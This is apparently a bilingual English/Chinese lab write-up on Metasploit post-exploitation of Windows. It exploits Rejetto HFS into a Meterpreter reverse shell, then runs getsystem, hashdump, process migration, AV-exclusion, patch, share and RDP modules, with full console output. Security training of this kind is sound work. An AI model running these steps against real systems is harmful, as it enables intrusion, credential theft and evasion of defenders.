Windows Post Exploitation Modules
The MSF provides us with various post exploitation modules for both Windows and Linux.
We can utilize these post exploitation modules to enumerate information about the Windows system we currently have access to:
- Enumerate user privileges
- Enumerate logged on users
- VM check
- Enumerate installed programs
- Enumerate Avs
- Enumerate computers connected to domain
- Enumerate installed patches
- Enumerate shares
Windows Post 漏洞利用模块
MSF 为我们提供了适用于 Windows 和 Linux 的各种后期利用模块。
我们可以利用这些后期利用模块来枚举有关我们当前可以访问的 Windows 系统的信息:
- 枚举用户权限
- 枚举登录用户
- 虚拟机检查
- 枚举已安装的程序
- 枚举 Avs
- 枚举连接到域的计算机
- 枚举已安装的补丁
- 枚举共享
Demo: Windows Post Exploitation Modules(演示:Windows Post 漏洞利用模块)
We have ability to enumerate the user privileges for the current user that we have access to within our Meterpreter session.
We can also enumerate the logged on users, which is very helpful in getting an idea of what users are currently logged in as well as users that have recently logged in.
You can also enumerate the programs that are currently installed on the target system, which can be very helpful during the privilege escalation process because you may find a specific version or a specific program that’s installed that could be vulnerable to a privilege escalation attack.
We can also enumerate the computers that are connected to the domain. So, if the target system is part of a Window domain, we can enumerate the other computers that are part of the domain, which can be very helpful in performing pivoting or getting an idea of what other systems are currently on the target network.
We can also enumerate the installed patches or the installed updates on the Windows system. So we can get an idea of what patches have been installed, which can be very helpful if we are trying to identify what exploits can actually be used to elevate our privileges on this particular Windows system.
Target IP Address: 10.2.23.169
1
2
3
4
5
6
7
8
service postgresql start && msfconsole
workspace -a windows_post
setg RHOSTS 10.2.23.169
db_nmap -sV 10.2.23.169
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
run
The target operating system architecture is 64-bit and the Meterpreter architecture is 32-bit. So we can upgrade that.
1
2
3
4
5
6
meterpreter > sysinfo
Architecture : x64
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > help
Manage Meterpreter and Shell Sessions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Priv:提升命令
======================
命令 说明
------ ----------
getsystem 尝试将您的特权提升到本地系统的特权。
Priv:密码数据库命令
================================
命令 说明
------ ----------
hashdump 转储 SAM 数据库的内容
1
meterpreter > screenshot
Try and elevate our privileges. NT AUTHORITY\SYSTEM is the highest level of privilege on a Windows system.
1
2
3
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We can also run the hashdump command to dump hashes. And in this case, it looks like that failed primarily because we may not have access to the SAM database.
1
meterpreter > hashdump
show_mount command will display a list of mounts or drives attached to the system.
It also tells us the type, whether it’s fixed or whether it is removable. In the case of removable, that would typically indicate that this is a USB flash drive or an external hard drive.
That is the process of enumerating the mounts and drives attached to the Windows target.
1
meterpreter > show_mount
List out the process tree.
1
meterpreter > ps
If we want to migrate to explorer.exe, we can utilize the process id or the name of the process.
1
2
3
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- -----
2212 2164 explorer.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\explorer.exe
I can migrate to the process id 2212, which is a 64-bit process, which means our Meterpreter session will also be upgraded.
We now have a 64-bit Meterpreter session.
1
2
3
meterpreter > migrate 2212
meterpreter > sysinfo
Meterpreter : x64/windows
1
2
3
4
5
6
meterpreter > dir # ls
meterpreter > cd C:\\
meterpreter > dir
meterpreter > cat flag.txt
meterpreter > pwd # Print out our current working directory
meterpreter > download flag.txt
Put this in the background because we want to run some post exploitation modules.
1
meterpreter > sessions
1
2
3
Id Name Type Information Connection
--- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN 10.10.5.2:4444 -> 10.2.23.169:49246 (10.2.23.169)
Let’s take a look at some of the post exploitation modules we can use.
So first and foremost, if you ever want to migrate or change the architecture of the Meterpreter payload.
This module checks if the meterpreter architecture is the same as the OS architecture and if it’s incompatible it spawns a new process with the correct architecture and migrates into that process.
架构迁移
该模块检查 meterpreter 架构是否与 OS 架构相同,如果不兼容,它会生成一个具有正确架构的新进程并迁移到该进程中。
Windows Manage Process Migration
This module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
Windows 管理进程迁移
该模块会将 Meterpreter 会话从一个进程迁移到另一个进程。要迁移到的给定进程 PID 或模块可以生成一个并迁移到新生成的进程。
In this case, this will allow us to create a new process and then migrate into it.
The reason that failed is because we already migrated our process.
1
2
3
4
5
search migrate
use post/windows/manage/migrate
show options
set SESSION 1
run
1
2
3
sessions
sessions 1
meterpreter > background
Windows Gather Privileges Enumeration
This module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status and current process PRIVILEGES.
Windows 收集权限枚举
如果启用了 UAC,并且当前帐户启用了 ADMIN,则此模块将打印。它还将打印 UID、前台 SESSION ID、是 SYSTEM 状态和当前进程 PRIVILEGES。
This will enumerate the privileges of the current user that we have access to.
1
2
3
4
5
search win_privs
use post/windows/gather/win_privs
show options
set SESSION 1
run
Do we currently have system privileges? No, we don’t. But of course, we were able to elevate our privileges. But the technique through which we did that was through token impersonation, which doesn’t give our current user or rather our current session administrative privileges, it means that current process or we have impersonated the token of an elevated process. So we would still have administrative privileges or NT AUTHORITY\SYSTEM privileges within that Meterpreter session, but the actual session itself will not be considered elevated.
Is user access control enabled? True. That can also be a very good privilege escalation attack vector.
Windows Privileges can give you an idea of what you can do currently as these are the Windows privileges associated with this particular user.
Check what users are currently logged on.
Windows Gather Logged On User Enumeration (Registry)
This module will enumerate current and recently logged on Windows users.
Windows 收集登录用户枚举(注册表)
该模块将枚举当前和最近登录的 Windows 用户。
This will check and will tell us whether we have any currently logged on users or it’ll enumerate any of the previous logged on users, which will give us an idea of what users are frequently logging on to the system, as well as the users that are currently on there. And that can give us a bit of a heads up in regards to whether or not we are being watched or whether or not our activities are being noticed.
1
2
3
4
5
search enum_logged_on
use post/windows/gather/enum_logged_on_users
show options
set SESSION 1
run
The currently logged on user is Administrator. And then the recently logged on users are provided. So it looks like apart from the Administrator, we have only had a few other service accounts here that have logged in. So that’s a good thing from an attacker’s perspective, because the last thing you want is to have someone detect your activity and consequently terminate your access.
the Check VM module will tell you whether the target system is indeed a virtual machine.
checkvm
The checkvm post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.
检查虚拟机
checkvm post模块非常简单,用于检查受感染的主机是否是虚拟机。该模块支持 Hyper-V、VMWare、VirtualBox、Xen 和 QEMU 虚拟机。
And this information is important because if the target is a virtual machine, then we could potentially utilize some VM breakout exploit modules to break out of the virtual machine and consequently gain access to the host operating system that is hosting the virtual machine.
1
2
3
4
5
search checkvm
use post/windows/gather/checkvm
show options
set SESSION 1
run
So we’ve been able to enumerate the user privileges, we’ve also been able to get an idea of the currently logged on users, and we have also been able to get an idea of whether the target is indeed a virtual machine.
How to enumerate the installed programs on the target.
enum_applications
The enum_applications module enumerates the applications that are installed on the compromised host.
枚举应用程序
enum_applications模块枚举安装在受感染主机上的应用程序。
This will tell us what programs are installed on the target system.
These are the programs installed, as well as their versions, which is very important because if we identify a privilege escalation vulnerability within Mozilla Firefox version 80.0.1, then we could potentially utilize Firefox to elevate our privileges. In this case, we can see that there’s really nothing apart from Mozilla Firefox in regards to third party programs here. We have a few AWS drivers which might give us an idea of where this virtual machine is running. And in this case, it looks like the virtual machine is running in an AWS cloud environment.
1
2
3
4
5
search enum_applications
use post/windows/gather/enum_applications
show options
set SESSION 1
run
Whenever you utilize a post exploitation module, the results will be stored within the following directory, and you can always access the locations of these particular files by typing in the loot command. So if you created a workspace and you started up the PostgreSQL database server, then all of this data is going to be stored within the MSF database, and you can access that data by typing in loot.
1
loot
View->Show Hidden, List this out as a list.
Check what antivirus software or rather what antivirus solutions are installed on the target system, as well as enumerate the excluded folders that have been specified within the antivirus system. So we can get an idea of what folders are not being scanned by the antivirus solutions installed.
Windows Antivirus Exclusions Enumeration
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Windows 防病毒排除项枚举
该模块将从受支持的 AV 产品中枚举基于文件、目录、进程和扩展名的排除项,这些产品目前包括 Microsoft Defender、Microsoft Security Essentials/Antimalware 和 Symantec Endpoint Protection。
Windows Defender is the antivirus solution installed on Windows systems. So if there are any excluded folders that are not being scanned, then that can be very useful information as we could potentially use those directories to store our exploit code or any payloads that we want to transform on the target and execute on disk.
It will enumerate the excluded folders for all of these antivirus solutions.
1
2
3
4
5
search type:post platform:windows enum_av
use post/windows/gather/enum_av_excluded
show options
set SESSION 1
run
So in this case, no excluded folders or extensions have been set, which means the entire file system is being scanned and monitored by the antivirus solution.
Let’s take a look at the ability to enumerate the computers that are part of the domain.
Windows Gather Active Directory Computers
This module will enumerate computers in the default AD directory.
Windows 收集 Active Directory 计算机
此模块将枚举默认 AD 目录中的计算机。
1
2
3
4
5
search enum_computers
use post/windows/gather/enum_computers
show options
set SESSION 1
run
So we know that it’s a sole system that’s running within AWS, and it’s also a virtual machine. It’s running Windows Server 2012.
How to enumerate the installed patches, which is very important during privilege escalation.
Windows Gather Applied Patches
This module enumerates patches applied to a Windows system using the WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.
Windows 收集已应用的补丁
此模块使用 WMI 查询枚举应用于 Windows 系统的补丁:SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering。
This will enumerate or gather applied patches on the target system.
KB: A comma separated list of KB patches to search for. If you are trying to identify whether a particular patch has been installed, a patch that sorted out or fixed a vulnerability that you wanted to exploit.
1
2
3
4
5
search enum_patches
use post/windows/gather/enum_patches
show options
set SESSION 1
run
1
Known bug in WMI query, try migrating to another process.
1
2
sessions
sessions 1
List out the current process tree.
1
meterpreter > ps
We can try and migrate to another process.
1
2
3
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- -----
896 660 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1
2
3
meterpreter > migrate 896
meterpreter > background
run
But what we could do in order to identify this information is we could open the session.
We can open up a shell session, which will open up a command prompt, and we can get this information by saying systeminfo. This is a Windows native command. It provides you with a list of all installed patches on the target system.
So if that post exploitation module fails on you, you can always revert to manual search or manual enumeration.
1
2
3
4
5
sessions 1
meterpreter > shell
C:\Windows\system32>systeminfo
C:\Windows\system32>^C # Terminate this channel.
meterpreter > background # Put our Meterpreter session in the background.
enum_shares module will allow us to enumerate any shares.
enum_shares
The enum_shares post module returns a listing of both configured and recently used shares on the compromised system.
枚举共享
enum_shares post 模块返回受感染系统上已配置和最近使用的共享列表。
The print$ share is used to facilitate the sharing of printers. The sharing of resources on Windows is facilitated through SMB.
1
2
3
4
5
search enum_shares
use post/windows/gather/enum_shares
show options
set SESSION 1
run
The ability to check whether RDP is enabled. And RDP is the remote desktop protocol, and that protocol is used to remotely access a Windows system. And we can get a graphical user interface instead of utilizing a terminal.
Windows Manage Enable Remote Desktop
This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target’s port 3389/tcp.
Windows 管理启用远程桌面
此模块启用远程桌面服务 (RDP)。它提供了创建帐户并将其配置为本地管理员和远程桌面用户组成员的选项。它还可以转发目标的端口 3389/tcp。
This module allow you to enable RDP on the target.
We could be able to establish an RDP session with the target system. But as I said, we will be exploring RDP during the Windows exploitation section. So once we have explored privilege escalation persistence, we’ll take a look at how to enable RDP and how to access the target via RDP.
1
2
3
4
5
search rdp platform:windows
use post/windows/manage/enable_rdp
show options
set SESSION 1
run
Windows Post Exploitation Modules(Windows Post 漏洞利用模块)
Overview
Goal
This lab covers the process of automating various phases of post-exploitation through the use of various Metasploit modules.
目标
本实验涵盖了通过使用各种 Metasploit 模块自动执行后期利用的各个阶段的过程。
Target IP Address : 10.0.29.158
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > workspace -a windows_post
[*] Added workspace: windows_post
[*] Workspace: windows_post
msf5 > setg RHOSTS 10.0.29.158
RHOSTS => 10.0.29.158
msf5 > db_nmap -sV 10.0.29.158
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-12 17:04 IST
[*] Nmap: Nmap scan report for 10.0.29.158
[*] Nmap: Host is up (0.0027s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http HttpFileServer httpd 2.3
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49165/tcp open msrpc Microsoft Windows RPC
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 76.86 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.29.158 80 tcp http open HttpFileServer httpd 2.3
10.0.29.158 135 tcp msrpc open Microsoft Windows RPC
10.0.29.158 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.29.158 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.29.158 3389 tcp ssl/ms-wbt-server open
10.0.29.158 49152 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49153 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49154 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49155 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49165 tcp msrpc open Microsoft Windows RPC
The HttpFileServer is rejetto.
1
2
3
4
5
6
7
8
9
msf5 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.29.158 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.21.3:4444
[*] Using URL: http://0.0.0.0:8080/P431TWLBjtvhm
[*] Local IP: http://10.10.21.3:8080/P431TWLBjtvhm
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /P431TWLBjtvhm
[*] Sending stage (180291 bytes) to 10.0.29.158
[*] Meterpreter session 1 opened (10.10.21.3:4444 -> 10.0.29.158:49428) at 2023-02-12 17:12:55 +0530
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\iOyMAAXCco.vbs' on the target
meterpreter >
[!] Tried to delete %TEMP%\iOyMAAXCco.vbs, unknown result
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
1
meterpreter > help
1
2
meterpreter > screenshot
Screenshot saved to: /root/nzJJeaCT.jpeg
1
2
3
4
5
6
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
1
2
3
4
5
6
7
8
9
10
11
meterpreter > show_mount
Mounts / Drives
===============
Name Type Size (Total) Size (Free) Mapped to
---- ---- ------------ ----------- ---------
C:\ fixed 29.66 GiB 8.68 GiB
Total mounts/drives: 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
336 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
348 4 smss.exe x64 0
496 488 csrss.exe x64 0
560 552 csrss.exe x64 1
568 488 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
596 552 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
656 568 services.exe x64 0
664 568 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
720 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
748 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
792 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
848 596 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
860 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
908 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
932 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1060 656 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1096 656 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1148 656 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAgent.exe
1168 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1204 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1284 656 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1636 720 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
1648 720 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1984 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2000 2320 cmd.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\cmd.exe
2040 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2124 2656 hfs.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\hfs\hfs.exe
2188 908 taskhostex.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\taskhostex.exe
2224 656 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2236 2224 explorer.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\explorer.exe
2320 2596 oUeujjzFnDugeFt.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Users\ADMINI~1\AppData\Local\Temp\1\rad7EDFA.tmp\oUeujjzFnDugeFt.exe
2596 2124 wscript.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\wscript.exe
2656 2236 powershell.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2676 2656 conhost.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\conhost.exe
2944 2000 conhost.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\conhost.exe
1
2
3
4
5
6
7
8
9
10
11
meterpreter > migrate 2236
[*] Migrating from 2320 to 2236...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > dir
meterpreter > cd c:\\
meterpreter > dir
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2020-08-12 09:43:47 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-08-22 21:16:48 +0530 BOOTNXT
40777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
40777/rwxrwxrwx 0 dir 2013-08-22 21:09:30 +0530 PerfLogs
40555/r-xr-xr-x 4096 dir 2013-08-22 19:06:16 +0530 Program Files
40777/rwxrwxrwx 4096 dir 2013-08-22 19:06:16 +0530 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2013-08-22 19:06:16 +0530 ProgramData
40777/rwxrwxrwx 0 dir 2020-09-05 09:16:25 +0530 System Volume Information
40555/r-xr-xr-x 4096 dir 2013-08-22 19:06:16 +0530 Users
40777/rwxrwxrwx 24576 dir 2013-08-22 19:06:16 +0530 Windows
100444/r--r--r-- 398356 fil 2013-08-22 21:16:48 +0530 bootmgr
100666/rw-rw-rw- 32 fil 2020-09-14 12:21:58 +0530 flag.txt
40777/rwxrwxrwx 0 dir 2020-09-14 11:40:20 +0530 hfs
0000/--------- 219552576 fif 1976-12-15 21:06:32 +0530 pagefile.sys
meterpreter > download flag.txt
[*] Downloading: flag.txt -> flag.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): flag.txt -> flag.txt
[*] download : flag.txt -> flag.txt
meterpreter > cat flag.txt
f74c8347798f4082daf4b4570dba094ameterpreter > pwd
c:\
1
2
3
4
5
6
7
8
9
10
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN 10.10.21.3:4444 -> 10.0.29.158:49428 (10.0.29.158)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 exploit(windows/http/rejetto_hfs_exec) > search migrate
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution
1 exploit/windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
2 exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
3 post/windows/capture/keylog_recorder normal No Windows Capture Keystroke Recorder
4 post/windows/capture/lockout_keylogger normal No Windows Capture Winlogon Lockout Credential Keylogger
5 post/windows/gather/enum_services normal No Windows Gather Service Info Enumeration
6 post/windows/gather/local_admin_search_enum normal No Windows Gather Local Admin Search
7 post/windows/gather/memory_grep normal No Windows Gather Process Memory Grep
8 post/windows/manage/add_user_domain normal No Windows Manage Add User to the Domain and/or to a Domain Group
9 post/windows/manage/archmigrate normal No Architecture Migrate
10 post/windows/manage/migrate normal No Windows Manage Process Migration
11 post/windows/manage/mssql_local_auth_bypass normal No Windows Manage Local Microsoft SQL Server Authorization Bypass
12 post/windows/manage/priv_migrate normal No Windows Manage Privilege Based Process Migration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/windows/manage/migrate
msf5 post(windows/manage/migrate) > show options
Module options (post/windows/manage/migrate):
Name Current Setting Required Description
---- --------------- -------- -----------
KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID 0 no PID of process to migrate to.
PPID 0 no Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).
PPID_NAME no Name of process for PPID spoofing when creating a new process.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If set, notepad.exe is used.
msf5 post(windows/manage/migrate) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/migrate) > run
[*] Running module against WIN-OMCNBKR66MN
[*] Current server process: Explorer.EXE (2236)
[-] Post failed: NoMethodError undefined method `downcase' for nil:NilClass
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:46:in `block in []'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each_process'
[-] /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:45:in `[]'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:81:in `create_temp_proc'
[-] /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:47:in `run'
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf5 post(windows/manage/migrate) > use post/windows/manage/archmigrate
msf5 post(windows/manage/archmigrate) > show options
Module options (post/windows/manage/archmigrate):
Name Current Setting Required Description
---- --------------- -------- -----------
EXE C:\windows\sysnative\svchost.exe yes The executable to start and migrate into
FALLBACK true yes If the selected migration executable does not exist fallback to a sysnative file
IGNORE_SYSTEM false yes Migrate even if you have SYSTEM privileges
SESSION yes The session to run this module on.
msf5 post(windows/manage/archmigrate) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/archmigrate) > run
[*] You're not running as SYSTEM. Moving on...
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2424
[*] Migrating..
[+] Success!
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
msf5 post(windows/manage/migrate) > use post/windows/gather/win_privs
msf5 post(windows/gather/win_privs) > show options
Module options (post/windows/gather/win_privs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/win_privs) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/win_privs) > run
Current User
============
Is Admin Is System Is In Local Admin Group UAC Enabled Foreground ID UID
-------- --------- ----------------------- ----------- ------------- ---
True False True True 1 WIN-OMCNBKR66MN\Administrator
Windows Privileges
==================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf5 post(windows/gather/win_privs) > search enum_logged_on
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_logged_on_users normal No Windows Gather Logged On User Enumeration (Registry)
msf5 post(windows/gather/win_privs) > use post/windows/gather/enum_logged_on_users
msf5 post(windows/gather/enum_logged_on_users) > show options
Module options (post/windows/gather/enum_logged_on_users):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently logged on users
RECENT true yes Enumerate Recently logged on users
SESSION yes The session to run this module on.
